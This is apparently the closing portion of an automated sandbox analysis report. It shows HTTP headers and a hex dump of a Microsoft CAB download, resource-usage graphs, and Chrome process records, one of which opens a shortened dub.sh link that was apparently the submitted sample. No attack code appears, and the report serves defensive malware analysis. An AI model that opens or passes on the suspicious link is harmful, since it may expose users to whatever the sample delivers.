                          Content-Type: application/octet-stream
                          Expires: -1
                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                          ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                          MS-CorrelationId: 52b449e0-36af-42fe-86cc-457147e5ced4
                          MS-RequestId: 85bd4fee-a48a-40de-bfc5-f4dbf6f13f31
                          MS-CV: b2Cu+JauL0KQPzc6.0
                          X-Microsoft-SLSClientCache: 1440
                          Content-Disposition: attachment; filename=environment.cab
                          X-Content-Type-Options: nosniff
                          Date: Wed, 23 Oct 2024 20:58:55 GMT
                          Connection: close
                          Content-Length: 30005
                          2024-10-23 20:58:56 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                          Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                          2024-10-23 20:58:56 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                          Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                          Statistics

                          CPU Usage

                          050100s020406080100

                          Click to jump to process

                          Memory Usage

                          050100s0.0050100MB

                          Click to jump to process

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:16:58:03
                          Start date:23/10/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                          Imagebase:0x7ff7f9810000
                          File size:3'242'272 bytes
                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false
                          Show Windows behavior

                          File Activities

                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                          Show Windows behavior

                          Process Activities

                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                          Show Windows behavior

                          Memory Activities

                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                          Show Windows behavior

                          Process Token Activities


                          General

                          Target ID:1
                          Start time:16:58:03
                          Start date:23/10/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1864,i,10136855794902392152,9737319549396712890,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Imagebase:0x7ff7f9810000
                          File size:3'242'272 bytes
                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false
                          Show Windows behavior

                          File Activities

                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                          Show Windows behavior

                          Memory Activities


                          General

                          Target ID:2
                          Start time:16:58:04
                          Start date:23/10/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dub.sh/vu352zF"
                          Imagebase:0x7ff7f9810000
                          File size:3'242'272 bytes
                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true
                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                          Disassembly

                          No disassembly